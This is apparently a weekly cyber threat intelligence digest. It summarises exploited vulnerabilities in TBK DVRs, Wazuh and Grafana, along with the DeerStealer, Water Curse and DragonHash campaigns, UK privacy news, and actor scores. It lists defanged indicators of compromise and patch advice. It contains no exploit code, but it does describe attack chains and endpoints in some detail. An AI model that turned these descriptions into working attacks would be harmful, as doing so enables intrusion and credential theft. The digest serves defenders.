Executive Summary -
Highlights of Cyber Threat Intelligence Digest
Vulnerabilities
Exploitation of CVE-2024-3721 in TBK DVRs for Mirai Botnet Deployment - On June 6, 2025, Kaspersky reported active exploitation of CVE-2024-3721, a command injection vulnerability in TBK digital video recorder (DVR) systems. Disclosed in April 2024, the flaw affects TBK-DVR-4104 and DVR-4216 devices up to version 20240412 due to improper input handling in the /device.rsp file.
Threat actors are leveraging a proof-of-concept exploit published by “netsecfish” to send crafted POST requests that download and execute a Mirai-based ARM32 binary. The malware features RC4 string encryption, VM detection, and anti-emulation techniques, enabling infected devices to perform DDoS attacks and proxy traffic.
Kaspersky observed exploitation via Linux honeypots, with attacks targeting internet-exposed DVRs in China, India, Egypt, Ukraine, Russia, Türkiye, and Brazil. An estimated 50,000 devices remain vulnerable, and no patch has been released by TBK Vision as of this writing.
Threat Actors Actively Exploiting CVE-2025-24016 - Since March 2025, threat actors have been exploiting CVE-2025-24016, an insecure deserialisation vulnerability in Wazuh versions 4.4.0 to 4.9.0, to distribute Mirai malware variants. The flaw, disclosed in February 2025 and patched in version 4.9.1, enables remote code execution via unsanitised JSON deserialisation in the DistributedAPI component. Attackers manipulate the auth_context parameter on the /security/user/authenticate/run_as endpoint, using hard-coded credentials to execute malicious Python code.
Two botnets have exploited this flaw: one deploys LZRD Mirai variants and connects to command-and-control servers including nuklearcnc.duckdns[.]org and cbot.galaxias[.]cc, the latter hosting a disguised Windows RAT. The second, utilising the resgod Mirai variant, targets IoT devices and exploits additional vulnerabilities in Huawei, Realtek, ZyXEL, and TP-Link routers, among others.
Both botnets perform scanning, lateral movement, and malware propagation across multiple protocols. Some infrastructure uses Italian-language domains, suggesting possible targeting of Italian-speaking users.
CVE-2025-4123 in Grafana Puts Over 46,000 Instances at Risk via Plugin-Based Exploit - On 15 June 2025, Ox Security reported that around 46,000 Grafana instances remain vulnerable to CVE-2025-4123, also known as Grafana Ghost. Grafana is a widely used open-source platform for analytics and data visualisation. To date, there is no evidence of active exploitation of this vulnerability in the wild.
CVE-2025-4123 is a chained vulnerability combining client-side path traversal with an open redirect, resulting in cross-site scripting (XSS). Exploiting this flaw allows threat actors to craft malicious links, potentially leading to account takeover. The vulnerability was discovered by Alvaro Balada via a bug bounty programme, and Grafana issued a security patch on 21 May 2025.
Potential Threats
DeerStealer Distributed via HijackLoader in ClickFix Social Engineering Campaign - In May 2025, eSentire reported a campaign in which threat actors used HijackLoader to deploy DeerStealer, also known as XFiles spyware. The campaign relied on ClickFix, a social engineering method that manipulates user behaviour to execute malicious PowerShell commands via phishing redirects. This initiated a multi-stage infection chain that ultimately enabled the theft of credentials, browser data, and cryptocurrency wallet information.
The infection process began with victims downloading a malicious MSI installer, which wrote files to the system and abused a signed COMODO binary to sideload a tampered DLL. This redirected execution through shellcode to launch HijackLoader, which used steganography and DLL sideloading to decrypt further payloads and inject DeerStealer into a renamed legitimate binary.
DeerStealer, sold by the dark web actor “LuciferXfiles” as a tiered subscription service, is capable of stealing data from browsers, extensions, email clients, VPNs, FTP tools, messaging apps, and cryptocurrency wallets. It also hijacks clipboard contents, establishes persistence through encrypted command-and-control channels using proxy domains, and enables remote access and file exfiltration via hidden VNC modules. The malware employs extensive obfuscation, including control flow manipulation and custom virtual machine-based string decryption, to avoid detection.
Water Curse Targets Red Teams and Developers via Weaponised GitHub Repositories - On 16 June 2025, Trend Micro reported that a newly identified threat group, Water Curse, is using weaponised GitHub repositories to deliver multistage malware. The group has leveraged at least 76 GitHub accounts to distribute malicious Visual Studio project files embedded with harmful build scripts, primarily targeting red teams, developers, penetration testers, and gamers.
The attack begins when victims download ZIP archives containing Visual Studio projects rigged with batch scripts. These scripts trigger VBScript, which launches obfuscated PowerShell code that downloads encrypted archives. These archives unpack Electron-based applications, which deploy binaries such as SearchFilter.exe to perform system reconnaissance, privilege escalation, anti-analysis, and persistence via scheduled tasks.
Additional payloads are injected into trusted processes like RegAsm.exe. These final-stage components harvest browser data, steal credentials, and profile the system, exfiltrating the data through services like Telegram and Gofile.
DragonHash PoC Tool for NTLM Hash Theft via Chromium Drag-and-Drop Published on GitHub - On June 13, 2025, TrustedSec released DragonHash, a proof-of-concept tool demonstrating how Chromium’s drag-and-drop feature can be abused to steal NTLM hashes from Windows machines.
DragonHash tricks victims into dragging an image from a webpage onto their desktop, triggering an automatic NTLM authentication request to a threat actor’s SMB server. This leaks Windows credentials without user interaction.
Operators configure DragonHash by embedding their SMB server’s IP into the HTML and hosting it to lure victims via phishing or social engineering. When the victim performs the drag-and-drop, their system exposes the NTLM hash to the attacker’s Responder tool for offline cracking or relay attacks.
As of writing, DragonHash has 17 stars and 2 forks on GitHub. Links to the repository and TrustedSec’s blog are provided in the Validation URL section.
General News
Scattered Spider Targets UK and US Insurance Sector Following Retail Attacks - In June 2025, Google’s Threat Intelligence Group warned that threat actor Scattered Spider has shifted its focus from the retail sector to the insurance industry, particularly in the United States. Several intrusions have been detected, with activity believed to have begun in early June. Victims include Erie Insurance and Philadelphia Insurance Companies, both of which reported network disruptions. While attribution was not confirmed, the tactics match Scattered Spider’s known methods.
Google tracks the campaign under UNC3944, an actor that overlaps with Scattered Spider but with a more specific focus. The group is known for social engineering - posing as internal IT staff to manipulate help desks and call centres - tactics that are effective in large, decentralised insurance firms with outsourced IT operations.
This activity follows a broader wave of attacks by Scattered Spider on high-profile retail organisations in the UK and US, including Marks & Spencer, the Co-op and luxury retailer Harrods were attacked as well as stores like Victoria’s Secret, North Face, Cartier, Adidas, Dior, and Tiffany. The group has also been observed abusing Salesforce tools to escalate access and exfiltrate sensitive data.
WhatsApp Joins Apple’s Legal Battle with UK Government Over Encryption – On June 11, 2025, WhatsApp announced it is seeking to intervene in a legal dispute between Apple and the UK government. The case concerns whether Apple can be compelled to retain access to users’ iCloud content to comply with legal warrants.
The dispute follows an April ruling by the Investigatory Powers Tribunal, which confirmed Apple’s lawsuit against the UK government over a secret legal order. WhatsApp’s CEO, Will Cathcart, said the company wants to protect privacy globally and oppose any law that weakens encryption.
The UK government reportedly issued Apple a Technical Capability Notice (TCN), demanding it halt the rollout of its Advanced Data Protection feature, which enables end-to-end encryption of iCloud content. Apple disabled this feature for UK users in February without confirming the reason.
While the government neither confirms nor denies such legal demands, experts and academics have criticised its secrecy and called for greater transparency. The government maintains TCNs do not grant direct access to data but ensure existing legal powers remain effective and insists the measures are vital to preventing serious crime.
The Investigatory Powers Tribunal has yet to set a timetable for the case.
UK Data Privacy Regulator Fines 23andMe $3M Over Cybersecurity Failures Following 2023 Breach - The UK’s data privacy watchdog has fined personal genomics firm 23andMe over $3 million for poor cybersecurity and a delayed response to a major 2023 data breach exposing millions of customers’ genetic data.
The Information Commissioner’s Office (ICO) said 23andMe failed to implement basic protections such as multifactor authentication and secure passwords and lacked systems to detect or respond to cyber threats. The breach, caused by credential stuffing, began in April 2023 and continued for months before the company fully acknowledged it in October.
Nearly 156,000 UK users had personal data compromised, including family trees and health information. The ICO criticised 23andMe for slow investigation and inadequate security, noting the company only improved protections by the end of 2024.
UK Information Commissioner John Edwards said, “Once this information is out there, it cannot be changed like a password or credit card number. 23andMe failed to take basic steps to protect it.”
Threat Actor Weekly Graph
Over the past 7 days, we have been tracking the following intent and opportunity changes within our Threat Actor Landscape.
Intent represents the potential targets of a group. When a group is observed attacking a different organisation or entity, their intent will increase.
Opportunity represents the various methods and technologies these groups may use. For example, if a group started using a new attack vector, such as a new kind of ransomware, their opportunity would increase.
Both intent and opportunity are scored out of 100 and are responsible for scoring the group’s severity. These updates can be seen below.
| ● Limited Severity | ● Basic Severity | ● Moderate Severity | ● High Severity |
| Threat Actor | Severity Increase | Opportunity | Intent | ||||||
|---|---|---|---|---|---|---|---|---|---|
| Pioneer Kitten | Moderate | → | ● Moderate | 60 | → | ● 61 | 25 | → | ● 25 |
| BO Team | NEW | → | ● Basic | NEW | → | ● 49 | NEW | → | ● 30 |
| Rare Werewolft | NEW | → | ● Basic | NEW | → | ● 40 | NEW | → | ● 25 |
| B14ckHOOD | NEW | → | ● Basic | NEW | → | ● 30 | NEW | → | ●25 |
| XXX Team Ransomware Group | NEW | → | ● Basic | NEW | → | ● 25 | NEW | → | ●30 |
Global Trends Powered by Recorded Future
Within each category, we have provided the current top five globally trending items. Each item is linked to how actively trending it is and is marked with a small symbol.
The spikes in references are calculated over 60 days and are normalised to ensure they aren’t disproportionate when compared to bigger entities that will naturally have more baseline mentions.
▲- Spike – This indicates a large increase in reporting volume and a high diversity in the event descriptions,
▲- Rise – This indicates a small increase in reporting volume with little diversity in the descriptions.
| Attackers | Methods | Vulnerabilities | Targets | ||||
|---|---|---|---|---|---|---|---|
| Predatory Sparrow | ▲ |
Targeted Attacks |
▲ | CVE-2025-2783 | ▲ |
Banking |
▲ |
|
JINX-0132 |
▲ |
Compromised Credentials |
▲ | CVE-2023-0386 | ▲ |
Autimotive |
▲ |
|
Scattered Spider |
▲ |
Remote Code Execution |
▲ | CVE-2024-12168 | ▲ |
23andMe |
▲ |
|
Cyber Av3ngers |
▲ |
Account Takeover |
▲ | CVE-2025-33073 | ▲ |
Public Transportation |
▲ |
|
FIN7 |
▲ |
Cyber spying |
▲ |
CVE-2021-26855 |
▲ |
Finance |
▲ |
Prominent Information Security Events
DeerStealer Distributed via HijackLoader in ClickFix Social Engineering Campaign
Source: Insikt Group | Validated Intelligence Event
IOC: URL - hxxps://luckyseaworld[.]com/nownow[.]txt
IOC: Domain Name - brokpolok[.]shop
IOC: SHA256 - 3a03afc1313854359603522e0792f6a8f9153519eac645cf5811824d936cfbc7
In May 2025, eSentire’s Threat Response Unit (TRU) observed a malware campaign in which threat actors used HijackLoader to deploy DeerStealer (also known as XFiles spyware), an information-stealing malware sold by “LuciferXfiles” on the dark web.
The attack chain began with ClickFix, a social engineering technique exploiting user behaviour. Victims were redirected to a phishing page instructing them to run an encoded PowerShell command via the Windows Run prompt. This downloaded a malicious Microsoft Installer (now.msi) from luckyseaworld[.]com, which wrote files to C:\ProgramData\ and launched a signed COMODO binary (EngineX_Co64.exe). The binary sideloaded a tampered cmdres.dll containing a malicious C runtime hook that redirected execution to shellcode, which resolved Windows API hashes and decrypted the next payload.
HijackLoader, active since 2023, is known for hiding configuration data using steganography in PNG files. In this campaign, it performed DLL sideloading and module stomping on vssapi.dll, then decrypted further payloads from an encrypted file (Bairrout.xd) using a custom key and offset. Ultimately, it injected DeerStealer into a renamed legitimate binary (SecureLoader_test.exe, based on Q-Dir) and leveraged d3d9.dll for continued execution.
DeerStealer, marketed under the XFiles Spyware brand, is sold via tiered subscriptions ($200–$3000/month). It includes:
- Credential and data theft: From over 50 browsers, 800+ extensions, email clients, VPNs, FTP clients, messengers, and cryptocurrency wallets.
- Clipboard hijacking: Replaces cryptocurrency addresses copied to the clipboard for 14+ currencies.
- Persistence and C2: Uses HTTPS with custom encryption and proxy domains (“Gasket”) for persistent command-and-control communication and victim fingerprinting.
- Remote access and exfiltration: Includes hidden VNC modules and a FileGrabber tool to exfiltrate selected file types.
- Obfuscation: Employs heavy control-flow obfuscation and virtual machine-based string decryption, hindering analysis and detection.
Water Curse Targets Red Teams and Developers via Weaponised GitHub Repositories
Source: Insikt Group | Validated Intelligence Event
Source: Insikt Group | Validated Intelligence Event
IOC: IP - 46.101.236[.]176
IOC: SHA-1: 4c391ebeff4cdfbc87ca83772a535d4386e5a5b2
IOC: URL: hxxps://rlim[.]com/seraswodinsx/rawURL
On June 16, 2025, Trend Micro reported that a newly identified threat group, Water Curse, is leveraging weaponised GitHub repositories to deliver a multistage malware campaign. The group operates at least 76 GitHub accounts, distributing malicious Visual Studio project files embedded with compromised build scripts. Their primary targets include red teams, penetration testers, developers, and gamers.
The attack begins when victims download ZIP archives from GitHub containing Visual Studio projects laced with malicious batch scripts. These trigger VBScript, which executes obfuscated PowerShell responsible for downloading encrypted payloads and extracting Electron-based applications. These apps deploy binaries such as SearchFilter.exe to perform system reconnaissance, privilege escalation, anti-analysis measures, and establish persistence via scheduled tasks.
In the final stage, additional payloads are injected into trusted Windows processes like RegAsm.exe, enabling browser data collection, credential theft, and host profiling. Exfiltration is conducted through services like Telegram and Gofile, helping the malware blend with normal network activity.
Remediation Actions
Following the information provided above, we recommend that the technologies mentioned be fully patched and updated. We also want to highlight and recommend applying the following patches where applicable:
- CVE-2024-3721: Organisations should upgrade to version 21.1050, actively monitor for suspicious POST requests, and isolate any vulnerable servers to prevent compromise.
- CVE-2025-4123: Organisations are strongly advised to apply the latest vendor-released Grafana update to mitigate exploitation risks.
- CVE-2025-24016: Organisations should update Wazuh to version 4.9.1 or later to address this critical vulnerability and minimise exposure.
If you are currently an Acumen Cyber Vulnerability Management customer, we will be proactively performing related searching and hunting activities within your environment.